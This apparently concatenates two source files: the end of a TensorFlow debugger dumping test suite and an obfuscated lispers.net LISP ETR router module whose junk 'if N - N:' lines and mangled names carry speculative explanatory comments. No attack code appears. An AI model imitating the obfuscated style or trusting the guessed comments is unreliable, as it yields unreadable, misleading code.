tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types.count("Mul"), 1 + num_threads)
self.assertEqual(
executed_op_types.count("ReadVariableOp"), 2 * (1 + num_threads))
for output_slot in output_slots:
self.assertEqual(output_slot, 0)
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "CONCISE_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 5)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose(tensor_value[1:], [1, 0, 0, 0])
elif tensor_debug_mode == "SHAPE":
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
for mul_value in mul_values:
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(mul_value[0], 0)
# 2nd element: dtype enum value (float32).
self.assertEqual(mul_value[1], 1)
# 3rd element: rank.
self.assertEqual(mul_value[2], 0)
# 4th element: element count.
self.assertEqual(mul_value[3], 1)
# Remaining elements: shape padded to a fixed length.
self.assertAllClose(mul_value[4:], [0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
self.assertAllClose(mul_values, [6.0, 6.0, 6.0, 6.0])
def testMultiThreadedDumpingWithDifferentSettings(self):
dump_root_1 = os.path.join(self.dump_root, "dump_root_1")
dump_root_2 = os.path.join(self.dump_root, "dump_root_2")
v1 = variables.Variable(10.0, dtype=dtypes.float32)
v2 = variables.Variable(3.0, dtype=dtypes.float32)
def add_negative_v1_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_1, tensor_debug_mode="FULL_TENSOR")
# Run in a loop to facilitate interleaving between threads.
for _ in range(3):
v1.assign_add(-(v1 ** 2.0))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
def add_negative_v2_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_2, tensor_debug_mode="FULL_TENSOR")
v2_squared = v2 ** 2.0
# Since dumping is disabled before the Neg op is called, no tensor data
# should be dumped from the op, but this shouldn't affect the dumping of
# the tensor data from the Neg op in `add_negative_v1_squared_to_itself`.
# Both behaviors are checked below.
dumping_callback.disable_dump_debug_info()
negative_v2_squared = -v2_squared
v2.assign_add(negative_v2_squared)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
# v2 is mutated on a sub-thread.
sub_thread = threading.Thread(target=add_negative_v2_squared_to_itself)
sub_thread.start()
add_negative_v1_squared_to_itself() # v1 is mutated on the main thread.
sub_thread.join()
# 10 - 10 * 10 = -90.
# -90 - (-90 * -90) = -8190.
# -8190 - (-8190 * -8190) = -67084290.
self.assertAllClose(v1.read_value(), -67084290.0)
self.assertAllClose(v2.read_value(), -6.0)
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile(dump_root=dump_root_1)
v1_squared_values = [
tensor_values[i] for i, op_type in enumerate(executed_op_types)
if op_type == "Pow"]
negative_v1_squared_values = [
tensor_values[i] for i, op_type in enumerate(executed_op_types)
if op_type == "Neg"]
self.assertAllClose(v1_squared_values, [[100.0], [8100.0], [67076100.0]])
self.assertAllClose(
negative_v1_squared_values, [[-100.0], [-8100.0], [-67076100.0]])
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile(dump_root=dump_root_2)
self.assertNotIn("Neg", executed_op_types)
v2_squared_values = tensor_values[executed_op_types.index("Pow")]
self.assertAllClose(v2_squared_values, [9.0])
@test_util.run_in_graph_and_eager_modes
def testNestedContextIsCapturedByGraphOpCreationHistory(self):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0 - 1.0
i += 1
return x
x = constant_op.constant(2.0, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
# 2 * 2 - 1 = 3; 3 * 2 - 1 = 5; 5 * 2 - 1 = 9; 9 * 2 - 1 = 17.
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 17.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(_, _, op_name_to_op_type,
op_name_to_context_id) = self._readAndCheckGraphsFile(stack_frame_by_id)
less_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Less"]
less_context_ids = [op_name_to_context_id[op_name]
for op_name in less_op_names]
mul_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Mul"]
mul_context_ids = [op_name_to_context_id[op_name]
for op_name in mul_op_names]
sub_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Sub"]
sub_context_ids = [op_name_to_context_id[op_name]
for op_name in sub_op_names]
self.assertLen(less_context_ids, 1)
self.assertLen(mul_context_ids, 1)
self.assertLen(sub_context_ids, 1)
self.assertTrue(less_context_ids[0])
self.assertTrue(mul_context_ids[0])
self.assertTrue(sub_context_ids[0])
# The Less op is from the while-loop cond context and hence should have
# a different innermost context ID from the mul and sub ops, which are both
# from the while-loop body context.
self.assertNotEqual(less_context_ids[0], mul_context_ids[0])
self.assertNotEqual(less_context_ids[0], sub_context_ids[0])
# The Mul and Sub ops are from the same innermost context.
self.assertEqual(mul_context_ids[0], sub_context_ids[0])
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelPredict(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
batch_size = 5
xs = np.ones([batch_size, 3, 4])
self.assertAllClose(model.predict(xs), np.zeros([batch_size, 1]))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graphs are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
for value_list in tensor_values:
if tensor_debug_mode == "NO_TENSOR":
self.assertFalse(value_list)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the model prediction.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
else:
# Refrain from asserting the internal implementation details of the LSTM
# layer.
concrete_tensor_values = [
value for value in tensor_values
if value is not None and value.size > 0
]
self.assertTrue(concrete_tensor_values)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelFit(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
xs = np.ones([5, 3, 4])
ys = np.ones([5, 1])
history = model.fit(xs, ys, epochs=3, verbose=0)
self.assertAllClose(
history.history["loss"], [1.0, 0.9603999853134155, 0.9223681688308716])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graphs are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
for value_list in tensor_values:
self.assertFalse(value_list)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the recurrent model's fit() call.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
self.assertTrue(
("SigmoidGrad" in executed_op_types and
"TanhGrad" in executed_op_types or
"CudnnRNNBackprop" in executed_op_types))
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testMobileNetV2Fit(self, tensor_debug_mode):
"""Test that training a Keras MobileNetV2 model works with dumping enabled."""
# Use a large circular-buffer to make sure we capture all the executed ops.
writer = dumping_callback.enable_dump_debug_info(
self.dump_root,
tensor_debug_mode=tensor_debug_mode,
circular_buffer_size=100000)
model = mobilenet_v2.MobileNetV2(
input_shape=(32, 32, 3), alpha=0.1, weights=None)
y = model.layers[22].output
y = core.Flatten()(y)
y = core.Dense(1)(y)
model = models.Model(inputs=model.inputs, outputs=y)
batch_size = 2
xs = np.zeros([batch_size] + list(model.input_shape[1:]))
ys = np.zeros([batch_size] + list(model.output_shape[1:]))
model.compile(optimizer="sgd", loss="mse")
epochs = 1
history = model.fit(xs, ys, epochs=epochs, verbose=0)
self.assertLen(history.history["loss"], epochs)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graphs are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
executed_op_types, _, _, _, _, _ = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the model's fit() call.
self.assertIn("Conv2D", executed_op_types)
self.assertIn("Relu6", executed_op_types)
self.assertIn("Conv2DBackpropFilter", executed_op_types)
self.assertIn("Relu6Grad", executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "FULL_TENSOR":
conv2d_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Conv2D"
]
self.assertTrue(conv2d_values)
for conv2d_value in conv2d_values:
self.assertGreater(len(conv2d_value.shape), 1)
self.assertEqual(conv2d_value.shape[0], batch_size)
relu6_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Relu6"
]
self.assertTrue(relu6_values)
for relu6_value in relu6_values:
self.assertGreater(len(relu6_value.shape), 1)
self.assertEqual(relu6_value.shape[0], batch_size)
conv2d_bp_filter_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Conv2DBackpropFilter"
]
self.assertTrue(conv2d_bp_filter_values)
for conv2d_bp_filter_value in conv2d_bp_filter_values:
self.assertGreater(len(conv2d_bp_filter_value.shape), 1)
relu6_grad_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Relu6Grad"
]
self.assertTrue(relu6_grad_values)
for relu6_grad_value in relu6_grad_values:
self.assertGreater(len(relu6_grad_value.shape), 1)
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
lisp-etr.py
|
#-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import time
import pcappy
import struct
import commands
import os
try :
import pytun
except :
pytun = None
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
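# Hedged reading of the obfuscated source: the dict below appears to map
# IPv4 multicast control-message type codes (IGMP/DVMRP/PIMv1/mtrace) to
# human-readable names, presumably for logging.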
IiII1IiiIiI1 = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 40 - 40: oo * OoO0O00
if 2 - 2: ooOO00oOo % oOo0O0Ooo * Ooo00oOo00o . oOoO0oo0OOOo + iiiiIi11i
if 24 - 24: II11iiII / OoOO0ooOOoo0O + o0000oOoOoO0o * i1I1ii1II1iII % oooO0oo0oOOOO
if 53 - 53: o0oo0o / Oo + o0oo0o / oooO0oo0oOOOO * OoooooooOO + i1I1ii1II1iII
if 71 - 71: II11iiII * i1I1ii1II1iII . II11iiII / o0oo0o
if 14 - 14: iIii1I11I1II1
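# Hedged reading: module-level state with obfuscated names -- sockets,
# registration/Info-Request timers, an ephemeral UDP port (i11 obtained from
# lisp.lisp_get_ephemeral_port()), and an interval constant (oOOoo = 60).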
o0oOoO00o = None
i1 = None
oOOoo00O0O = None
i1111 = None
i11 = lisp . lisp_get_ephemeral_port ( )
I11 = None
Oo0o0000o0o0 = [ None , None , None ]
oOo0oooo00o = None
oO0o0o0ooO0oO = None
oo0o0O00 = None
if 68 - 68: II11iiII . oo / i1I1ii1II1iII
oOOoo = 60
if 43 - 43: o0oo0o % oo - i11iIiiIii - ooOO00oOo / II11iiII - oOo0O0Ooo
if 45 - 45: o0oo0o + o0000oOoOoO0o
if 17 - 17: Ooo00oOo00o
if 64 - 64: o0000oOoOoO0o % i1IIi % OoooooooOO
if 3 - 3: i1I1ii1II1iII + O0
if 42 - 42: II11iiII / i1IIi + i11iIiiIii - o0000oOoOoO0o
if 78 - 78: ooOO00oOo
if 18 - 18: O0 - i1I1ii1II1iII / i1I1ii1II1iII + Oo % Oo - oooO0oo0oOOOO
if 62 - 62: i1I1ii1II1iII - oooO0oo0oOOOO - oOo0O0Ooo % i1IIi / iiiiIi11i
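# Hedged reading: handler for the "lisp database-mapping" configuration
# command. It stores the mapping via lispconfig and, unless NAT traversal is
# in use, (re)starts a 5-second timer that triggers Map-Register sending
# (ooO0o0Oo) once map-servers are configured.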
def OoooooOoo ( kv_pair ) :
global i1
global Oo0o0000o0o0
if 70 - 70: ooOO00oOo . ooOO00oOo - ooOO00oOo / oOoO0oo0OOOo * II11iiII
lispconfig . lisp_database_mapping_command ( kv_pair , i11 )
if 86 - 86: i11iIiiIii + o0000oOoOoO0o + Oo * OoOO0ooOOoo0O + Ooo00oOo00o
if 61 - 61: ooOO00oOo / i11iIiiIii
if 34 - 34: OoooooooOO + iIii1I11I1II1 + i11iIiiIii - oOoO0oo0OOOo + i11iIiiIii
if 65 - 65: oOo0O0Ooo
if 6 - 6: oo / OoO0O00 % o0000oOoOoO0o
if 84 - 84: i11iIiiIii . Ooo00oOo00o
if 100 - 100: o0000oOoOoO0o - o0000oOoOoO0o - o0oo0o
if 20 - 20: OoooooooOO
if ( lisp . lisp_nat_traversal ) : return
if ( i1 != None and
i1 . is_alive ( ) ) : return
if 13 - 13: i1IIi - o0000oOoOoO0o % iiiiIi11i / iIii1I11I1II1 % i1I1ii1II1iII
if ( len ( lisp . lisp_map_servers_list ) > 0 ) :
i1 = threading . Timer ( 5 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
i1 . start ( )
if 78 - 78: iIii1I11I1II1 - o0000oOoOoO0o * ooOO00oOo + Ooo00oOo00o + i1I1ii1II1iII + i1I1ii1II1iII
if 11 - 11: i1I1ii1II1iII - ooOO00oOo % Oo % i1I1ii1II1iII / oOo0O0Ooo - ooOO00oOo
if 74 - 74: i1I1ii1II1iII * O0
if 89 - 89: iiiiIi11i + OoO0O00
if 3 - 3: i1IIi / oo % OoOO0ooOOoo0O * i11iIiiIii / O0 * OoOO0ooOOoo0O
if 49 - 49: iiiiIi11i % o0000oOoOoO0o + i1IIi . oo % oOoO0oo0OOOo
if 48 - 48: OoOO0ooOOoo0O + OoOO0ooOOoo0O / II111iiii / iIii1I11I1II1
if 20 - 20: Ooo00oOo00o
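# Hedged reading: builds the ETR "show" page -- local RLOCs, decap stats,
# the configured map-servers table, database-mappings, and any ELP/RLE/JSON
# and group-mapping lists -- and returns it as an HTML string.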
def oO00 ( clause ) :
if 53 - 53: OoooooooOO . i1IIi
if 18 - 18: Ooo00oOo00o
if 28 - 28: II11iiII - oooO0oo0oOOOO . oooO0oo0oOOOO + oOo0O0Ooo - OoooooooOO + O0
if 95 - 95: ooOO00oOo % iiiiIi11i . O0
I1i1I = lispconfig . lisp_show_myrlocs ( "" )
if 80 - 80: oOo0O0Ooo - ooOO00oOo
if 87 - 87: iiiiIi11i / OoOO0ooOOoo0O - i1IIi * II11iiII / OoooooooOO . O0
if 1 - 1: II111iiii - OoOO0ooOOoo0O / OoOO0ooOOoo0O
if 46 - 46: o0000oOoOoO0o * II11iiII - ooOO00oOo * iiiiIi11i - o0oo0o
I1i1I = lispconfig . lisp_show_decap_stats ( I1i1I , "ETR" )
if 83 - 83: OoooooooOO
if 31 - 31: II111iiii - II11iiII . o0oo0o % oOo0O0Ooo - O0
if 4 - 4: II111iiii / Oo . i1I1ii1II1iII
if 58 - 58: II11iiII * i11iIiiIii / oOo0O0Ooo % o0oo0o - oOoO0oo0OOOo / iiiiIi11i
ii11i1 = lisp . lisp_decent_dns_suffix
if ( ii11i1 == None ) :
ii11i1 = ":"
else :
ii11i1 = " (dns-suffix '{}'):" . format ( ii11i1 )
if 29 - 29: oOoO0oo0OOOo % oo + Oo / Ooo00oOo00o + II11iiII * Ooo00oOo00o
if 42 - 42: o0000oOoOoO0o + iiiiIi11i
o0O0o0Oo = "{} configured map-servers" . format ( len ( lisp . lisp_map_servers_list ) )
Ii11Ii1I = "LISP-ETR Configured Map-Servers{}" . format ( ii11i1 )
Ii11Ii1I = lisp . lisp_span ( Ii11Ii1I , o0O0o0Oo )
if 72 - 72: i1I1ii1II1iII / i1IIi * OoO0O00 - o0oo0o
o0O0o0Oo = ( "P = proxy-reply requested, M = merge-registrations " + "requested, N = Map-Notify requested" )
if 51 - 51: II111iiii * ooOO00oOo % Ooo00oOo00o * II111iiii % oOoO0oo0OOOo / Oo
iIIIIii1 = lisp . lisp_span ( "Registration<br>flags" , o0O0o0Oo )
if 58 - 58: i11iIiiIii % OoOO0ooOOoo0O
I1i1I += lispconfig . lisp_table_header ( Ii11Ii1I , "Address" , "Auth-Type" ,
"xTR-ID" , "Site-ID" , iIIIIii1 , "Map-Registers<br>Sent" ,
"Map-Notifies<br>Received" )
if 71 - 71: II11iiII + Oo % i11iIiiIii + oOoO0oo0OOOo - oooO0oo0oOOOO
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
oO0OOoO0 . resolve_dns_name ( )
I111Ii111 = "" if oO0OOoO0 . ms_name == "all" else oO0OOoO0 . ms_name + "<br>"
i111IiI1I = I111Ii111 + oO0OOoO0 . map_server . print_address_no_iid ( )
if ( oO0OOoO0 . dns_name ) : i111IiI1I += "<br>" + oO0OOoO0 . dns_name
if 70 - 70: o0000oOoOoO0o . OoO0O00 / Ooo00oOo00o . o0000oOoOoO0o - O0 / oooO0oo0oOOOO
ooOooo000oOO = "0x" + lisp . lisp_hex_string ( oO0OOoO0 . xtr_id )
Oo0oOOo = "{}-{}-{}-{}" . format ( "P" if oO0OOoO0 . proxy_reply else "p" ,
"M" if oO0OOoO0 . merge_registrations else "m" ,
"N" if oO0OOoO0 . want_map_notify else "n" ,
"R" if oO0OOoO0 . refresh_registrations else "r" )
if 58 - 58: II111iiii * II11iiII * oOoO0oo0OOOo / II11iiII
oO0o0OOOO = oO0OOoO0 . map_registers_sent + oO0OOoO0 . map_registers_multicast_sent
if 68 - 68: i1I1ii1II1iII - o0oo0o - oo - oOoO0oo0OOOo + OoOO0ooOOoo0O
if 10 - 10: OoooooooOO % iIii1I11I1II1
I1i1I += lispconfig . lisp_table_row ( i111IiI1I ,
"sha1" if ( oO0OOoO0 . alg_id == lisp . LISP_SHA_1_96_ALG_ID ) else "sha2" ,
ooOooo000oOO , oO0OOoO0 . site_id , Oo0oOOo , oO0o0OOOO ,
oO0OOoO0 . map_notifies_received )
if 54 - 54: o0oo0o - II111iiii % oOo0O0Ooo % OoOO0ooOOoo0O % iIii1I11I1II1 + Oo
I1i1I += lispconfig . lisp_table_footer ( )
if 15 - 15: OoOO0ooOOoo0O * Oo * OoO0O00 % i11iIiiIii % oOo0O0Ooo - II11iiII
if 68 - 68: o0oo0o % i1IIi . oooO0oo0oOOOO . oOoO0oo0OOOo
if 92 - 92: i1I1ii1II1iII . o0oo0o
if 31 - 31: o0oo0o . oOo0O0Ooo / O0
I1i1I = lispconfig . lisp_show_db_list ( "ETR" , I1i1I )
if 89 - 89: oOo0O0Ooo
if 68 - 68: ooOO00oOo * OoooooooOO % O0 + ooOO00oOo + Oo
if 4 - 4: Oo + O0 * II11iiII
if 55 - 55: OoO0O00 + iIii1I11I1II1 / oOo0O0Ooo * iiiiIi11i - i11iIiiIii - o0000oOoOoO0o
if ( len ( lisp . lisp_elp_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_elp_list ( I1i1I )
if 25 - 25: oOoO0oo0OOOo
if 7 - 7: i1IIi / oo * o0oo0o . oooO0oo0oOOOO . iIii1I11I1II1
if 13 - 13: II11iiII / i11iIiiIii
if 2 - 2: oo / O0 / Ooo00oOo00o % oOo0O0Ooo % o0000oOoOoO0o
if 52 - 52: Ooo00oOo00o
if ( len ( lisp . lisp_rle_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_rle_list ( I1i1I )
if 95 - 95: o0000oOoOoO0o
if 87 - 87: Oo + oOo0O0Ooo . II11iiII + oOo0O0Ooo
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: Oo / oOo0O0Ooo - O0 - OoOO0ooOOoo0O
if ( len ( lisp . lisp_json_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_json_list ( I1i1I )
if 86 - 86: OoOO0ooOOoo0O % oOo0O0Ooo / oo / oOo0O0Ooo
if 42 - 42: ooOO00oOo
if 67 - 67: o0oo0o . i1I1ii1II1iII . O0
if 10 - 10: oOoO0oo0OOOo % oOoO0oo0OOOo - iIii1I11I1II1 / II11iiII + o0000oOoOoO0o
if 87 - 87: iiiiIi11i * oOoO0oo0OOOo + II11iiII / iIii1I11I1II1 / i1I1ii1II1iII
if ( len ( lisp . lisp_group_mapping_list ) != 0 ) :
Ii11Ii1I = "Configured Group Mappings:"
I1i1I += lispconfig . lisp_table_header ( Ii11Ii1I , "Name" , "Group Prefix" ,
"Sources" , "Use MS" )
for I1111IIi in lisp . lisp_group_mapping_list . values ( ) :
Oo0oO = ""
for IIiIi1iI in I1111IIi . sources : Oo0oO += IIiIi1iI + ", "
if ( Oo0oO == "" ) :
Oo0oO = "*"
else :
Oo0oO = Oo0oO [ 0 : - 2 ]
if 35 - 35: o0000oOoOoO0o % O0 - O0
I1i1I += lispconfig . lisp_table_row ( I1111IIi . group_name ,
I1111IIi . group_prefix . print_prefix ( ) , Oo0oO , I1111IIi . use_ms_name )
if 16 - 16: II111iiii % oOo0O0Ooo - II111iiii + o0000oOoOoO0o
I1i1I += lispconfig . lisp_table_footer ( )
if 12 - 12: II11iiII / II11iiII + i11iIiiIii
return ( I1i1I )
if 40 - 40: oo . iIii1I11I1II1 / oo / i11iIiiIii
if 75 - 75: OoOO0ooOOoo0O + Ooo00oOo00o
if 84 - 84: oooO0oo0oOOOO . i11iIiiIii . oooO0oo0oOOOO * oOoO0oo0OOOo - OoOO0ooOOoo0O
if 42 - 42: i11iIiiIii
if 33 - 33: i1I1ii1II1iII - O0 * i1IIi * Ooo00oOo00o - OoO0O00
if 32 - 32: OoooooooOO / iIii1I11I1II1 - Ooo00oOo00o
if 91 - 91: i1I1ii1II1iII % i1IIi % iIii1I11I1II1
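# Hedged reading: returns the ETR's crypto-key list for the show command.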
def IIi1I11I1II ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ETR" ) )
if 63 - 63: OoooooooOO - ooOO00oOo . II111iiii / Ooo00oOo00o . oOo0O0Ooo / O0
if 84 - 84: oooO0oo0oOOOO
if 86 - 86: oOo0O0Ooo - o0000oOoOoO0o - ooOO00oOo * i1I1ii1II1iII
if 66 - 66: OoooooooOO + O0
if 11 - 11: OoOO0ooOOoo0O + OoooooooOO - ooOO00oOo / Ooo00oOo00o + OoO0O00 . II111iiii
if 41 - 41: o0000oOoOoO0o - O0 - O0
if 68 - 68: II11iiII % o0oo0o
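# Hedged reading: handler for the "lisp map-server" configuration command.
# It parses addresses/dns-names, authentication and encryption keys, and the
# proxy-reply/merge/refresh/want-map-notify flags, creates lisp_ms() entries,
# starts an Info-Request timer when the first map-server appears, and sends
# an immediate Map-Register (or schedules one) when database-mappings exist.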
def ooO00OO0 ( kv_pairs ) :
global i1
global oOOoo00O0O
if 31 - 31: i1I1ii1II1iII % i1I1ii1II1iII % OoOO0ooOOoo0O
OOOOoo0Oo = [ ]
ii111iI1iIi1 = [ ]
OOO = 0
oo0OOo0 = 0
I11IiI = ""
O0ooO0Oo00o = False
ooO0oOOooOo0 = False
i1I1ii11i1Iii = False
I1IiiiiI = False
o0O = 0
I111Ii111 = None
IiII = 0
ii1iII1II = None
if 48 - 48: II111iiii * o0000oOoOoO0o . OoOO0ooOOoo0O + iiiiIi11i
for OoO0o in kv_pairs . keys ( ) :
oO0o0Ooooo = kv_pairs [ OoO0o ]
if ( OoO0o == "ms-name" ) :
I111Ii111 = oO0o0Ooooo [ 0 ]
if 94 - 94: Ooo00oOo00o * o0000oOoOoO0o / OoO0O00 / o0000oOoOoO0o
if ( OoO0o == "address" ) :
for oO0 in range ( len ( oO0o0Ooooo ) ) :
OOOOoo0Oo . append ( oO0o0Ooooo [ oO0 ] )
if 75 - 75: Oo + oOo0O0Ooo + Ooo00oOo00o * OoOO0ooOOoo0O % iiiiIi11i . i1I1ii1II1iII
if 55 - 55: II11iiII . oo
if ( OoO0o == "dns-name" ) :
for oO0 in range ( len ( oO0o0Ooooo ) ) :
ii111iI1iIi1 . append ( oO0o0Ooooo [ oO0 ] )
if 61 - 61: OoO0O00 % oooO0oo0oOOOO . OoO0O00
if 100 - 100: o0oo0o * O0
if ( OoO0o == "authentication-type" ) :
oo0OOo0 = lisp . LISP_SHA_1_96_ALG_ID if ( oO0o0Ooooo == "sha1" ) else lisp . LISP_SHA_256_128_ALG_ID if ( oO0o0Ooooo == "sha2" ) else ""
if 64 - 64: II11iiII % iIii1I11I1II1 * iiiiIi11i
if 79 - 79: O0
if ( OoO0o == "authentication-key" ) :
if ( oo0OOo0 == 0 ) : oo0OOo0 = lisp . LISP_SHA_256_128_ALG_ID
